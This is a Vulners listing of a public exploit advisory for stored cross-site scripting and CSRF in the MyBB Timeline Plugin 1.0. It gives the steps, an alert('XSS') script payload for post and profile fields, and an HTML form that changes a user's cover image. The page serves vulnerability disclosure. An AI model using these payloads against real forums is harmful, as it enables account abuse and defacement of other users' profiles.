Vulners
Lucene search
MyBB Timeline Plugin 1.0 - Persistent Cross-Site Scripting
# Exploit Title: MyBB Timeline Plugin 1.0 - Cross-Site Scripting / CSRF
# Date: 1/21/2021
# Author: 0xB9
# Software Link: https://community.mybb.com/mods.php?action=view&pid=1428
# Version: 1.0
# Tested on: Windows 10
1. Description:
MyBB Timeline replaces the default MyBB user profile. This introduces cross-site scripting on user profiles & a CSRF that allows for the users timeline banner/image to be changed.
2. Proof of Concept:
~ XSS via Thread/Post ~
- Make a new thread or reply to an existing thread
- Input a payload in either the thread title or main post itself <script>alert('XSS')</script>
Payload will execute when visiting your profile.
~ XSS via Location/Bio ~
- Go to User CP -> Edit Profile
- Input a payload in the Location/Bio <script>alert('XSS')</script>
Payload will execute when visiting your profile.
~ CSRF ~
<form class="coverpicForm" action="http://localhost/mybb/timeline.php?action=profile&uid=1" style="display: block;">
<input type="text" name="coverpic" placeholder="Add Image URL" required="">
<input type="hidden" name="do_coverpic" value="change">
<input type="submit" value="Change">
</form>Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
25 Jan 2021 00:00Current
7.4High risk
Vulners AI Score7.4